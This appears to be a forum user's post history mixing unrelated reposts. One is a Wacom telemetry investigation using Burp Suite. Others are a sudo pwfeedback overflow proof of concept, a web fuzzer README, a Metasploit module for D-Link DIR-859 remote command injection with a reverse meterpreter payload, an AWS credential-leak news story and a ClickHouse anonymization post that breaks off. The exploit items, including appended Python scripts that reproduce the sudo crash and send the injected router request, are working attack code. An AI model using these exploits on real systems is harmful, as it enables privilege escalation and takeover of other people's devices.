Everything posted by Fi8sVrs

  1. Chapter 1: The discovery I have a Wacom drawing tablet. I use it to draw cover illustrations for my blog posts, such as this one: Last week I set up my tablet on my new laptop. As part of installing its drivers I was asked to accept Wacom’s privacy policy. Being a mostly-normal person I never usually read privacy policies. Instead I vigorously hammer the “yes” button in an effort to reach the game, machine, or medical advice on the other side of the agreement as fast as possible. But Wacom’s request made me pause. Why does a device that is essentially a mouse need a privacy policy? I wondered. Sensing skullduggery, I decided to make an exception to my anti-privacy-policy-policy and give this one a read. In Wacom’s defense (that’s the only time you’re going to see that phrase today), the document was short and clear, although as we’ll see it wasn’t entirely open about its more dubious intentions (here’s the full text). In addition, despite its attempts to look like the kind of compulsory agreement that must be accepted in order to unlock the product behind it, as far as I can tell anyone with the presence of mind to decline it could do so with no adverse consequences. With that attempt at even-handedness out the way, let’s get kicking. In section 3.1 of their privacy policy, Wacom wondered if it would be OK if they sent a few bits and bobs of data from my computer to Google Analytics, “[including] aggregate usage data, technical session information and information about [my] hardware device.” The half of my heart that cares about privacy sank. The other half of my heart, the half that enjoys snooping on snoopers and figuring out what they’re up to, leapt. It was a disjointed feeling, probably similar to how it feels to get mugged by your favorite TV magician. Wacom didn’t say exactly what data they were going to send themselves. I resolved to find out. Chapter 2: Snooping on the snoopers I began my investigation with a strong presumption of chicanery. I was unable to imagine the project kickoff meeting in which Wacom decided to bundle Google Analytics with their device, which - remember - is essentially a mouse, but managed to restrain themselves from also grabbing some deliciously intrusive information while they were at it. I Googled “wacom google analytics”. There were a couple of Tweets and Reddit posts made by people who had also read Wacom’s privacy policy and been unhappy about its contents, but no one had yet tried to find out exactly what data Wacom were grabbing. No one had investigated Wacom’s understanding of the phrase “aggregate usage data” or whether it was anywhere near that of a reasonable person. I told my son to clear my schedule. He bashed two wooden blocks together in understanding, encouragement, and sheer admiration. In order to see what type of data Wacom was exfiltrating from my computer, I needed to snoop on the traffic that their driver was sending to Google Analytics. The most common way to do this is to set up a proxy server on your computer (I usually use Burp Suite). You tell your target program to send its traffic through your proxy. Your proxy logs the data it receives, and finally re-sends it on to its intended destination. When the destination sends back a response, the same process runs in reverse. 
+-------------------------------+
|My computer                    |
|                               |
|  +------+        +------+     |     +---------+
|  |Wacom +------->+Burp  +---------->+Google   |
|  |Driver+<-------+Suite +<----------+Analytics|
|  +------+        +--+---+     |     +---------+
|                     |         |
|                     | Log requests and responses
|                     v         |
|              /track?data=...  |
|                               |
+---------------------+---------+

Some applications, like web browsers, co-operate very well with proxies. They allow users to explicitly specify a proxy for them to send their traffic through. However, other applications (including the Wacom tablet drivers) provide no such conveniences. Instead, they require some special treatment.

Chapter 3: Wireshark

I started with a simple approach that was unlikely to work but was worth a try. I opened Wireshark, a program that watches your computer’s network traffic. I wanted to use Wireshark to view the raw bytes that the Wacom driver was sending to Google Analytics. If Wacom was sending my data over unencrypted HTTP then I’d immediately be able to see all of its gory details, no extra work required. On the other hand, if Wacom was using encrypted TLS/HTTPS then I would be foiled. The traffic would appear as garbled nonsense that I would be unable to decrypt, since I wouldn’t know the keys used to encrypt it.

I closed any noisy, network-connecting programs to reduce the chatter on the line, pressed Wireshark’s record button, and held onto my hat. Unfortunately, no unencrypted HTTP traffic appeared; only encrypted, garbled TLS. But there was good news amidst this setback. Wireshark also picks up DNS requests, which are used to look up the IP address that corresponds to a domain. I saw that my computer was making DNS requests to look up the IP address of www.google-analytics.com. The DNS response was coming back as 172.217.7.14, and lots of TLS-encrypted traffic was then heading out to that IP address. This meant that something was indeed talking to Google Analytics. I switched tactics and fired up Burp Suite proxy.

Chapter 4: Burp Suite

I now had two problems. First, I needed to persuade Wacom to send its Google Analytics traffic through Burp Suite. Second, I needed to make sure that Wacom would then complete a TLS handshake with Burp. To solve the first problem, I configured my laptop’s global HTTP and HTTPS proxies to point to Burp Suite. This meant that every program that respected these global settings would send its traffic through my proxy. Happily, it turned out that Wacom did respect my global proxy settings - my proxy quickly started logging “client failed TLS handshake” messages.

This brought me to my second problem. Since Wacom was talking to Google Analytics over TLS, it required the server to present a valid TLS certificate for www.google-analytics.com. As far as Wacom was concerned, my proxy was now the server it was talking to, not Google Analytics itself. This meant that I needed my proxy to present a certificate that Wacom would trust.

(Burp must present a valid cert for www.google-analytics.com)
                      |
+---------------------|---------+
|My computer          |         |
|                     v         |
|  +------+        +------+     |     +---------+
|  |Wacom +------->+Burp  +---------->+Google   |
|  |Driver+<-------+Suite +<----------+Analytics|
|  +------+        +--+---+     |     +---------+
|                     |         |
|                     | Log requests and responses
|                     v         |
|              /track?data=...  |
|                               |
+---------------------+---------+

The most difficult part of presenting such a certificate is that it needs to be cryptographically signed by a certificate authority that the program trusts.
Burp Suite can generate and sign certificates for any domain, no problem, but since by default no computer or program trusts Burp Suite as a certificate authority, the certificates it signs are rejected (I’ve written much more about TLS and HTTPS here and here). Once again, the process of persuading a web browser to trust Burp’s root certificate is well-documented, but for a thick application like Wacom I’d need to do something slightly different. I therefore used OSX’s Keychain to temporarily add Burp’s certificate to my computer’s list of root certificates. I assumed that Wacom would load its list of root certificates from my computer, and that by adding Burp to this list, Wacom would start to trust Burp and would complete a TLS handshake with my proxy.

I sat and waited. I watched Wireshark and Burp at the same time. If Wacom failed to connect to Burp, I’d see this failure in Wireshark. I was quite excited. Nothing happened. I wondered if the data dumping was triggered by a timer, or by some particular activity, or by both. I tried drawing something using my Wacom tablet. Still nothing. I plugged and unplugged it. Nothing. Then I went into the Wacom Driver Settings and restarted the driver. Everything happened.

When I restarted the Wacom driver, rather than lose all the data it had accumulated, the driver fired off everything it had collected to Google Analytics. This data materialized in my Burp Suite. I took a look. My heart experienced the same half-down-half-up schism as it had half an hour ago. Some of the events that Wacom were recording were arguably within their purview, such as “driver started” and “driver shutdown”. I still don’t want them to take this information because there’s nothing in it for me, but their attempt to do so feels broadly justifiable. What requires more explanation is why Wacom think it’s acceptable to record every time I open a new application, including the time, a string that presumably uniquely identifies me, and the application’s name.

Chapter 5: Analysis

I suspect that Wacom doesn’t really think that it’s acceptable to record the name of every application I open on my personal laptop. I suspect that this is why their privacy policy doesn’t really admit that this is what they do. I imagine that if pressed they would argue that the name of every application I open on my personal laptop falls into one of their broad buckets like “aggregate data” or “technical session information”, although it’s not immediately obvious to me which bucket.

It’s well-known that no one reads privacy policies and that they’re often a fig leaf of consent at best. But since Wacom’s privacy policy makes no mention of their intention to record the name of every application I open on my personal laptop, I’d argue that it doesn’t even give them the technical-fig-leaf-right to do so. In fact, I’d argue that even if someone had read and understood Wacom’s privacy policy, and had knowingly consented to a reasonable interpretation of the words inside it, that person would still not have agreed to allow Wacom to log and track the name of every application that they opened on their personal laptop. Of course, I’m not a lawyer, and I assume that whoever wrote this privacy policy is.

Wacom’s privacy policy does say that they only want this data for product development purposes, and on this point I do actually believe them. This might be naive, since who knows what goes on behind the scenes when large troves of data are involved.
Either way, while I do understand that product developers like to have usage data in order to monitor and improve their offerings, this doesn’t give them the right to take it. I care about this for two reasons. The first is a principled fuck you. I don’t care whether anything materially bad will or won’t happen as a consequence of Wacom taking this data from me. I simply resent the fact that they’re doing it. The second is that we can also come up with scenarios that involve real harms. Maybe the very existence of a program is secret or sensitive information. What if a Wacom employee suddenly starts seeing entries spring up for “Half Life 3 Test Build”? Obviously I don’t care about the secrecy of Valve’s new games, but I assume that Valve does. We can get more subtle. I personally use Google Analytics to track visitors to my website. I do feel bad about this, but I’ve got to get my self-esteem from somewhere. Google Analytics has a “User Explorer” tool, in which you can zoom in on the activity of a specific user. Suppose that someone at Wacom “fingerprints” a target person that they knew in real life by seeing that this person uses a very particular combination of applications. The Wacom employee then uses this fingerprint to find the person in the “User Explorer” tool. Finally the Wacom employee sees that their target also uses “LivingWith: Cancer Support”. Remember, this information is coming from a device that is essentially a mouse. This example is admittedly a little contrived, but it’s also an illustration that, even though this data doesn’t come with a name and social security number attached, it is neither benign nor inert. Chapter 6: Conclusion In some ways it feels unfair to single out Wacom. This isn’t the dataset that’s going to complete the embrace of full, totalitarian surveillance capitalism. Nonetheless, it’s still deeply obnoxious. A device that is essentially a mouse has no legitimate reasons to make HTTP requests of any sort. Maybe Wacom could hide in the sweet safety of murky territory if they released some sort of mobile app integration or a weekly personal usage report that required this data, but until then I’m happy to classify them as an obligingly clear case of nefariousness. Nonetheless, I’m not about to incinerate my Wacom tablet and buy a different one. These things are expensive, and privacy is hard to put a price on. If you too have a Wacom tablet (presumably this tracking is enabled for all of their models), open up the “Wacom Desktop Center” and click around until you find a way to disable the “Wacom Experience Program”. Then the next time you’re buying a tablet, remember that Wacom tries to track every app you open, and consider giving another brand a go. Epilogue I finished the first draft of this article three weeks ago. I set up Burp Suite proxy again so that I could grab some final screenshots of the data that Wacom was purloining. I restarted the Wacom driver, as per usual. But nothing happened. Wacom weren’t illegitimately siphoning off my personal usage data any more. The bastards. I contemplated pretending I hadn’t seen this and publishing my post anyway. Then I contemplated publishing it with an additional coda explaining this latest development. However, the title “Wacom drawing tablets used to track the name of every application that you open but now seem to have stopped for some reason” didn’t feel very snappy. I decided to do some more investigating. 
I had previously noticed that, before sending data to Google Analytics, the Wacom driver sent a HEAD request to the URL http://link.wacom.com/analytics/analytics.xml. I hadn’t been able to work out why, and until now I hadn’t thought much of it. However, now Wacom was responding to this request with a 404 “Not Found” status code instead of 200 “OK”. I realized that the request must be some kind of pre-flight check that allowed Wacom to turn off analytics collection remotely without requiring users to install a driver update. Now that the request was failing, Wacom were not sending themselves my data. I dug around in the driver’s logfile and found the following snippet that confirmed my suspicions: I wondered if Wacom had gotten wise to what I was up to and panic-disabled their tracking. This seemed unlikely, although the timing was rather coincidental. I decided that Wacom had probably simply made a boneheaded mistake and accidentally broken their own command-and-control center. I impatiently waited for them to realize their goof and bring their data exfiltration operation back online. I contemplated emailing Wacom to alert them to their problem, but couldn’t come up with a sufficiently innocuous way of doing so. I decided to wait until the end of the month before doing anything, in case the data was used for generating monthly reports. I hoped that on January 31st Wacom would notice that their graphs were broken and bring their system back online. On February 3rd I checked in and was elated at what I saw: I had no idea who Rick was, but I was glad he was back. Wacom were illegitimately siphoning off my personal data again, and I couldn’t be happier. I grabbed some better screenshots, fixed some grammar, and hit publish. The rest is history. Source
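Aside (not from the original post): the pre-flight check described above is easy to probe yourself. Below is a minimal sketch, using only Python's standard library, that sends the same kind of HEAD request and reports whether the endpoint currently answers 200.

# Sketch: probe the analytics "pre-flight" URL the driver was observed calling.
# A 200 response meant the driver would send analytics; a 404 disabled them.
import urllib.request
import urllib.error

PREFLIGHT_URL = "http://link.wacom.com/analytics/analytics.xml"

def analytics_enabled(url: str = PREFLIGHT_URL) -> bool:
    request = urllib.request.Request(url, method="HEAD")
    try:
        with urllib.request.urlopen(request, timeout=10) as response:
            return response.status == 200
    except urllib.error.HTTPError as err:   # e.g. 404: collection switched off remotely
        print(f"Server answered {err.code}")
        return False
    except urllib.error.URLError as err:    # DNS failure, timeout, etc.
        print(f"Request failed: {err.reason}")
        return False

if __name__ == "__main__":
    print("Analytics enabled:", analytics_enabled())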
  2. # Title: Sudo 1.8.25p - Buffer Overflow
# Author: Joe Vennix
# Software: Sudo
# Versions: Sudo versions prior to 1.8.26
# CVE: CVE-2019-18634
# Reference: https://www.sudo.ws/alerts/pwfeedback.html

# Sudo's pwfeedback option can be used to provide visual feedback when the user is inputting
# their password. For each key press, an asterisk is printed. This option was added in
# response to user confusion over how the standard Password: prompt disables the echoing
# of key presses. While pwfeedback is not enabled by default in the upstream version of sudo,
# some systems, such as Linux Mint and Elementary OS, do enable it in their default sudoers files.

# Due to a bug, when the pwfeedback option is enabled in the sudoers file, a user may be able
# to trigger a stack-based buffer overflow. This bug can be triggered even by users not listed
# in the sudoers file. There is no impact unless pwfeedback has been enabled.

The following sudoers configuration is vulnerable:

$ sudo -l
Matching Defaults entries for millert on linux-build:
    insults, pwfeedback, mail_badpass, mailerpath=/usr/sbin/sendmail

User millert may run the following commands on linux-build:
    (ALL : ALL) ALL

# Exploiting the bug does not require sudo permissions, merely that pwfeedback be enabled.
# The bug can be reproduced by passing a large input to sudo via a pipe when it prompts for a password.

$ perl -e 'print(("A" x 100 . "\x{00}") x 50)' | sudo -S id
Password: Segmentation fault

If pwfeedback is enabled in sudoers, the stack overflow may allow unprivileged users to escalate to the root account.

# 0day.today [2020-02-05] #

Source
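For reference, the Perl reproducer above can also be expressed in Python (a sketch that simply emits the same byte pattern to stdout, to be piped into sudo -S id on a test system where pwfeedback is enabled):

# Emits ("A" * 100 + NUL) repeated 50 times, mirroring the Perl one-liner above.
# Usage: python3 repro.py | sudo -S id
import sys

payload = (b"A" * 100 + b"\x00") * 50
sys.stdout.buffer.write(payload)
sys.stdout.buffer.flush()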
  3. Maavi is a fuzzing tool that scans for vulnerabilities with obfuscated payloads. It has proxy support, records a full history of actions, and has various bells and whistles.

# Maavi - Next level concept with Swiss Knife Powers - Complete Automated Cross Platform Fuzzing and Vulnerability Assessment Suite

# License
- EULA

# Screenshots
<div align="center"> <img src="https://i.ibb.co/qgc13zK/m1.png" /> </div>
<div align="center"> <img src="https://i.ibb.co/RNF4Jdw/m2.png" /> </div>
<div align="center"> <img src="https://i.ibb.co/GJPzmG8/m4.png" /> </div>
<div align="center"> <img src="https://i.ibb.co/L8FX4Qy/m5.png" /> </div>

# Video
- https://m.facebook.com/story.php?story_fbid=499162314119947&id=329284291107751

# Brief Introduction
- This is an all-in-one tool for identifying common, advanced, and OWASP Top 10 vulnerabilities, up to obfuscated payloads
- It saves time, provides true results, and shows what kind of danger is lurking in your web application and/or parameters

# Proxy support
- Automatically configured to run tests on any website using Tor
- Settings are handled automatically

# Vulnerability Assessment
- Automatically scan/fuzz for common, advanced, and OWASP Top 10 vulnerabilities:
  - PHP
  - Obfuscated strings
  - Buffer overflows
  - SSI
  - Command/template injection
  - LFI, RFI
  - SQL
  - Encoded payloads
    - Base64 encoding
    - Hexadecimal encoding
    - Single-to-double encoding
    - Obfuscation encoding
  - More...

# Parameters, Web, DOM, Directory
- Maavi can work on anything, including the DOM

# Cross Site Scripting Assessment
- Notifies if any ordinary XSS, obfuscated XSS, advanced payloads, WAF-bypass payloads, or reflections are found

# Payloads
- Add or remove common, advanced, OWASP Top 10, and obfuscated payloads
- Where other software fails to inject advanced payloads, or to let you inject your own payloads manually, Maavi will work

# Recorder
- Complete history of successful payloads
- Complete history of unsuccessful payloads
- Complete history of bypassed payloads
- Complete history of blocked payloads

# Fine Tune
- Fine-tune your payloads and inject

# Installation
chmod u+x *
./installer.sh

# Run
./maavi.sh

# Donate
- Send request to mrharoonawan@gmail.com

# Contact
- mrharoonawan@gmail.com

Download: maavi-master.zip (18.6 KB)

Source
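As a rough illustration of the encodings listed above (Base64, hex, single and double URL-encoding), here is a small stand-alone Python sketch; it is not Maavi's code, just the generic transformations a payload encoder applies:

# Illustrative payload encoders: Base64, hex, and single vs. double URL-encoding.
import base64
import binascii
from urllib.parse import quote

payload = "<script>alert(1)</script>"

encodings = {
    "base64": base64.b64encode(payload.encode()).decode(),
    "hex": binascii.hexlify(payload.encode()).decode(),
    "url": quote(payload, safe=""),
    "double-url": quote(quote(payload, safe=""), safe=""),
}

for name, value in encodings.items():
    print(f"{name:>10}: {value}")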
  4. D-Link DIR-859 Routers are vulnerable to OS command injection via the UPnP interface. The vulnerability exists in /gena.cgi (function genacgi_main() in /htdocs/cgibin), which is accessible without credentials.

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::CmdStager

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'D-Link DIR-859 Unauthenticated Remote Command Execution',
      'Description'    => %q{
        D-Link DIR-859 Routers are vulnerable to OS command injection via the
        UPnP interface. The vulnerability exists in /gena.cgi (function
        genacgi_main() in /htdocs/cgibin), which is accessible without credentials.
      },
      'Author'         =>
        [
          'Miguel Mendez Z., @s1kr10s', # Vulnerability discovery and initial exploit
          'Pablo Pollanco P.'           # Vulnerability discovery and metasploit module
        ],
      'License'        => MSF_LICENSE,
      'References'     =>
        [
          [ 'CVE', '2019-17621' ],
          [ 'URL', 'https://medium.com/@s1kr10s/d94b47a15104' ]
        ],
      'DisclosureDate' => 'Dec 24 2019',
      'Privileged'     => true,
      'Platform'       => 'linux',
      'Arch'           => ARCH_MIPSBE,
      'DefaultOptions' =>
        {
          'PAYLOAD'           => 'linux/mipsbe/meterpreter_reverse_tcp',
          'CMDSTAGER::FLAVOR' => 'wget',
          'RPORT'             => '49152'
        },
      'Targets'        =>
        [
          [ 'Automatic', { } ],
        ],
      'CmdStagerFlavor' => %w{ echo wget },
      'DefaultTarget'  => 0,
    ))
  end

  def execute_command(cmd, opts)
    callback_uri = "http://192.168.0." + Rex::Text.rand_text_hex(2).to_i(16).to_s + ":" +
      Rex::Text.rand_text_hex(4).to_i(16).to_s + "/" + Rex::Text.rand_text_alpha(3..12)
    begin
      send_request_raw({
        'uri'     => "/gena.cgi?service=`#{cmd}`",
        'method'  => 'SUBSCRIBE',
        'headers' => {
          'Callback' => "<#{callback_uri}>",
          'NT'       => 'upnp:event',
          'Timeout'  => 'Second-1800',
        },
      })
    rescue ::Rex::ConnectionError
      fail_with(Failure::Unreachable, "#{rhost}:#{rport} - Could not connect to the webservice")
    end
  end

  def exploit
    execute_cmdstager(linemax: 500)
  end
end

# 0day.today [2020-01-24] #

Source: 0day.today
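For readers studying the request itself, here is a minimal stand-alone sketch of the SUBSCRIBE request that execute_command() builds, for use only against your own lab device; the host, port, callback, and injected command below are placeholders, and this is not part of the Metasploit module:

# Sketch: send the UPnP SUBSCRIBE request with a command injected into the
# `service` parameter, mirroring what the module's execute_command() constructs.
import http.client

TARGET_HOST = "192.168.0.1"   # placeholder: your own lab device
TARGET_PORT = 49152
INJECTED_CMD = "id"           # placeholder command

conn = http.client.HTTPConnection(TARGET_HOST, TARGET_PORT, timeout=10)
conn.request(
    "SUBSCRIBE",
    f"/gena.cgi?service=`{INJECTED_CMD}`",
    headers={
        "Callback": "<http://192.168.0.2:8000/test>",  # placeholder callback URI
        "NT": "upnp:event",
        "Timeout": "Second-1800",
    },
)
response = conn.getresponse()
print(response.status, response.reason)
conn.close()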
  5. An Amazon Web Services (AWS) engineer last week inadvertently made public almost a gigabyte’s worth of sensitive data, including their own personal documents as well as passwords and cryptographic keys to various AWS environments. While these kinds of leaks are not unusual or special, what is noteworthy here is how quickly the employee’s credentials were recovered by a third party, who—to the employee’s good fortune, perhaps—immediately warned the company.

On the morning of January 13, an AWS employee, identified as a DevOps Cloud Engineer on LinkedIn, committed nearly a gigabyte’s worth of data to a personal GitHub repository bearing their own name. Roughly 30 minutes later, Greg Pollock, vice president of product at UpGuard, a California-based security firm, received a notification about a potential leak from a detection engine pointing to the repo. An analyst began working to verify what specifically had triggered the alert. Around two hours later, Pollock was convinced the data had been committed to the repo inadvertently and might pose a threat to the employee, if not AWS itself.

“In reviewing this publicly accessible data, I have come to the conclusion that data stemming from your company, of some level of sensitivity, is present and exposed to the public internet,” he told AWS by email. AWS responded gratefully about four hours later and the repo was suddenly offline.

Since UpGuard’s analysts didn’t test the credentials themselves—which would have been illegal—it’s unclear what precisely they grant access to. An AWS spokesperson told Gizmodo on Wednesday that all of the files were personal in nature, unrelated to the employee’s work. However, at least some of the documents in the cache are labeled “Amazon Confidential.” Alongside those documents are AWS and RSA key pairs, some of which are marked “mock” or “test.” Others, however, are marked “admin” and “cloud.” Another is labeled “rootkey,” suggesting it provides privileged control of a system. Other passwords are connected to mail services. And there are numerous auth tokens and API keys for a variety of third-party products. AWS did not provide Gizmodo with an on-the-record statement.

It is possible that GitHub would have eventually alerted AWS that this data was public. The site itself automatically scans public repositories for credentials issued by a specific list of companies, just as UpGuard was doing. Had GitHub been the one to detect the AWS credentials, it would have, hypothetically, alerted AWS. AWS would have then taken “appropriate action,” possibly by revoking the keys. But not all of the credentials leaked by the AWS employee are detected by GitHub, which only looks for specific types of tokens issued by certain companies. The speed with which UpGuard’s automated software was able to locate the keys also raises concerns about what other organizations have this capability; surely many of the world’s intelligence agencies are among them.

GitHub’s efforts to identify the leaked credentials its users upload—which began in earnest around five years ago—received scrutiny last year after a study at North Carolina State University (NCSU) unearthed over 100,000 repositories hosting API tokens and keys. (Notably, the researchers only examined 13 percent of all public repositories, which alone included billions of files.) While Amazon access key IDs and auth tokens were among the data examined by the NCSU researchers, a majority of the leaked credentials were linked to Google services.
GitHub did not respond to a request for comment. UpGuard says it chose to make the incident known to demonstrate the importance of early detection and underscore that cloud security is not invulnerable to human error. In this case, Pollock added, there’s no evidence that the engineer acted maliciously or that any customer data was affected. “Rather, this case illustrates the value of rapid data leaks detection to prevent small accidents from becoming larger incidents.” Via https://gizmodo.com/amazon-engineer-leaked-private-encryption-keys-outside-1841160934
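As a rough illustration of the kind of pattern matching UpGuard and GitHub perform, here is a small sketch; it is not either company's detection logic and covers only the widely documented AWS access key ID format:

# Sketch: scan files under a directory for strings shaped like AWS access key IDs.
# Real secret scanners check many more token formats and use additional heuristics.
import re
import sys
from pathlib import Path

AWS_KEY_ID = re.compile(r"\b(?:AKIA|ASIA)[0-9A-Z]{16}\b")

def scan(root: str) -> None:
    for path in Path(root).rglob("*"):
        if not path.is_file():
            continue
        try:
            text = path.read_text(errors="ignore")
        except OSError:
            continue
        for match in AWS_KEY_ID.finditer(text):
            print(f"{path}: possible AWS access key ID {match.group(0)}")

if __name__ == "__main__":
    scan(sys.argv[1] if len(sys.argv) > 1 else ".")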
  6. ClickHouse users already know that its biggest advantage is its high-speed processing of analytical queries. But claims like this need to be confirmed with reliable performance testing. That's what we want to talk about today. We started running tests in 2013, long before the product was available as open source. Back then, just like now, our main concern was data processing speed in Yandex.Metrica. We had been storing that data in ClickHouse since January of 2009. Part of the data had been written to a database starting in 2012, and part was converted from OLAPServer and Metrage (data structures previously used by Yandex.Metrica). For testing, we took the first subset at random from data for 1 billion pageviews. Yandex.Metrica didn't have any queries at that point, so we came up with queries that interested us, using all the possible ways to filter, aggregate, and sort the data. ClickHouse performance was compared with similar systems like Vertica and MonetDB. To avoid bias, testing was performed by an employee who hadn't participated in ClickHouse development, and special cases in the code were not optimized until all the results were obtained. We used the same approach to get a data set for functional testing. After ClickHouse was released as open source in 2016, people began questioning these tests. Shortcomings of tests on private data Our performance tests: Can't be reproduced independently because they use private data that can't be published. Some of the functional tests are not available to external users for the same reason. Need further development. The set of tests needs to be substantially expanded in order to isolate performance changes in individual parts of the system. Don't run on a per-commit basis or for individual pull requests. External developers can't check their code for performance regressions. We could solve these problems by throwing out the old tests and writing new ones based on open data, like flight data for the USA and taxi rides in New York. Or we could use benchmarks like TPC-H, TPC-DS, and Star Schema Benchmark. The disadvantage is that this data is very different from Yandex.Metrica data, and we would rather keep the test queries. Why it's important to use real data Performance should only be tested on real data from a production environment. Let's look at some examples. Example 1 Let's say you fill a database with evenly distributed pseudorandom numbers. Data compression isn't going to work in this case, although data compression is essential to analytical databases. There is no silver bullet solution to the challenge of choosing the right compression algorithm and the right way to integrate it into the system, since data compression requires a compromise between the speed of compression and decompression and the potential compression efficiency. But systems that can't compress data are guaranteed losers. If your tests use evenly distributed pseudorandom numbers, this factor is ignored, and the results will be distorted. Bottom line: Test data must have a realistic compression ratio. I covered optimization of ClickHouse data compression algorithms in a previous post. Example 2 Let's say we are interested in the execution speed of this SQL query: SELECT RegionID, uniq(UserID) AS visitors FROM test.hits GROUP BY RegionID ORDER BY visitors DESC LIMIT 10 This is a typical query for Yandex.Metrica. What affects the processing speed? How GROUP BY is executed. Which data structure is used for calculating the uniq aggregate function. 
How many different RegionIDs there are and how much RAM each state of the uniq function requires. But another important factor is that the amount of data is distributed unevenly between regions. (It probably follows a power law. I put the distribution on a log-log graph, but I can't say for sure.) If this is the case, it is important that the states of the uniq aggregate function with fewer values use very little memory. When there are a lot of different aggregation keys, every single byte counts. How can we get generated data that has all these properties? The obvious solution is to use real data. Many DBMSs implement the HyperLogLog data structure for an approximation of COUNT(DISTINCT), but none of them work very well because this data structure uses a fixed amount of memory. ClickHouse has a function that uses a combination of three different data structures, depending on the size of the data set.

Bottom line: Test data must represent distribution properties of the real data well enough, meaning cardinality (number of distinct values per column) and cross-column cardinality (number of different values counted across several different columns).

Example 3

Instead of testing the performance of the ClickHouse DBMS, let's take something simpler, like hash tables. For hash tables, it's essential to choose the right hash function. This is not as important for std::unordered_map, because it's a hash table based on chaining and a prime number is used as the array size. The standard library implementation in GCC and Clang uses a trivial hash function as the default hash function for numeric types. However, std::unordered_map is not the best choice when we are looking for maximum speed. With an open-addressing hash table, we can't just use a standard hash function. Choosing the right hash function becomes the deciding factor.

It's easy to find hash table performance tests using random data that don't take the hash functions used into account. There are also plenty of hash function tests that focus on the calculation speed and certain quality criteria, even though they ignore the data structures used. But the fact is that hash tables and HyperLogLog require different hash function quality criteria. You can learn more about this in "How hash tables work in ClickHouse" (presentation in Russian). The information is slightly outdated, since it doesn't cover Swiss Tables.

Challenge

Our goal is to obtain data for testing performance that has the same structure as Yandex.Metrica data with all the properties that are important for benchmarks, but in such a way that there remain no traces of real website users in this data. In other words, the data must be anonymized and still preserve:

- Compression ratio.
- Cardinality (the number of distinct values).
- Mutual cardinality between several different columns.
- Properties of probability distributions that can be used for data modeling (for example, if we believe that regions are distributed according to a power law, then the exponent — the distribution parameter — should be approximately the same for artificial data and for real data).

How can we get a similar compression ratio for the data? If LZ4 is used, substrings in binary data must be repeated at approximately the same distance and the repetitions must be approximately the same length. For ZSTD, entropy per byte must also coincide. The ultimate goal is to create a publicly available tool that anyone can use to anonymize their data sets for publication.
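As a toy illustration of the compression-ratio requirement above (not from the original post; zlib from the Python standard library stands in for LZ4/ZSTD):

# Random bytes are incompressible; repetitive, realistic-looking data compresses well.
# This is why test data must have a realistic compression ratio.
import os
import zlib

def ratio(data: bytes) -> float:
    return len(zlib.compress(data)) / len(data)

random_data = os.urandom(1_000_000)
repetitive_data = (b"GET /track?page=/home&region=225&user=1234\n" * 25_000)[:1_000_000]

print(f"random bytes:     compressed to {ratio(random_data):.2%} of original size")
print(f"repetitive bytes: compressed to {ratio(repetitive_data):.2%} of original size")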
This would allow us to debug and test performance on other people's data similar to our production data. We would also like the generated data to be interesting. However, these are very loosely-defined requirements and we aren't planning to write up a formal problem statement or specification for this task.

Possible solutions

I don't want to make it sound like this problem is particularly important. It was never actually included in planning and no one had intentions to work on it. I just kept hoping that an idea would come up some day, and suddenly I would be in a good mood and be able to put everything else off until later.

Explicit probabilistic models

The first idea is to take each column in the table and find a family of probability distributions that models it, then adjust parameters based on the data statistics (model fitting) and use the resulting distribution to generate new data. A pseudorandom number generator with a predefined seed could be used to get a reproducible result. Markov chains could be used for text fields. This is a familiar model that could be implemented effectively. However, it would require a few tricks:

- We want to preserve the continuity of time series. This means that for some types of data, we need to model the difference between neighboring values, rather than the value itself.
- To model "joint cardinality" of columns we will also have to explicitly reflect dependencies between columns. For instance, there are usually very few IP addresses per user ID, so to generate an IP address we would use a hash value of the user ID as a seed and also add a small amount of other pseudorandom data.
- We aren't sure how to express the dependency that the same user frequently visits URLs with matching domains at approximately the same time.

All this can be written in a C++ "script" with the distributions and dependencies hard coded. However, Markov models are obtained from a combination of statistics with smoothing and adding noise. I started writing a script like this, but after writing explicit models for ten columns, it became unbearably boring — and the "hits" table in Yandex.Metrica had more than 100 columns way back in 2012.

EventTime.day(std::discrete_distribution<>({
    0, 0, 13, 30, 0, 14, 42, 5, 6, 31, 17, 0, 0, 0, 0, 23, 10, ...})(random));
EventTime.hour(std::discrete_distribution<>({
    13, 7, 4, 3, 2, 3, 4, 6, 10, 16, 20, 23, 24, 23, 18, 19, 19, ...})(random));
EventTime.minute(std::uniform_int_distribution<UInt8>(0, 59)(random));
EventTime.second(std::uniform_int_distribution<UInt8>(0, 59)(random));

UInt64 UserID = hash(4, powerLaw(5000, 1.1));
UserID = UserID / 10000000000ULL * 10000000000ULL + static_cast<time_t>(EventTime) + UserID % 1000000;

random_with_seed.seed(powerLaw(5000, 1.1));
auto get_random_with_seed = [&]{ return random_with_seed(); };

This approach was a failure. If I had tried harder, maybe the script would be ready by now.

Advantages: Conceptual simplicity.

Disadvantages: Large amount of work required. The solution only applies to one type of data. And I would prefer a more general solution that can be used for Yandex.Metrica data as well as for obfuscating any other data.

In any case, this solution could be improved. Instead of manually selecting models, we could implement a catalog of models and choose the best among them (best fit plus some form of regularization). Or maybe we could use Markov models for all types of fields, not just for text. Dependencies between data could also be extracted automatically.
This would require calculating the relative entropy (relative amount of information) between columns. A simpler alternative is to calculate relative cardinalities for each pair of columns (something like "how many different values of A are there on average for a fixed value B"). For instance, this will make it clear that URLDomain fully depends on the URL, and not vice versa. But I rejected this idea as well, because there are too many factors to consider and it would take too long to write. Neural networks As I've already mentioned, this task wasn't high on the priority list — no one was even thinking about trying to solve it. But as luck would have it, our colleague Ivan Puzirevsky was teaching at the Higher School of Economics. He asked me if I had any interesting problems that would work as suitable thesis topics for his students. When I offered him this one, he assured me it had potential. So I handed this challenge off to a nice guy "off the street" Sharif (he did have to sign an NDA to access the data, though). I shared all my ideas with him but emphasized that there were no restrictions on how the problem could be solved, and a good option would be to try approaches that I know nothing about, like using LSTM to generate a text dump of data. This seemed promising after coming across the article The Unreasonable Effectiveness of Recurrent Neural Networks. The first challenge is that we need to generate structured data, not just text. But it wasn't clear whether a recurrent neural network could generate data with the desired structure. There are two ways to solve this. The first solution is to use separate models for generating the structure and the "filler" and only use the neural network for generating values. But this approach was postponed and then never completed. The second solution is to simply generate a TSV dump as text. Experience has shown that some of the rows in the text won't match the structure, but these rows can be thrown out when loading the data. The second challenge is that the recurrent neural 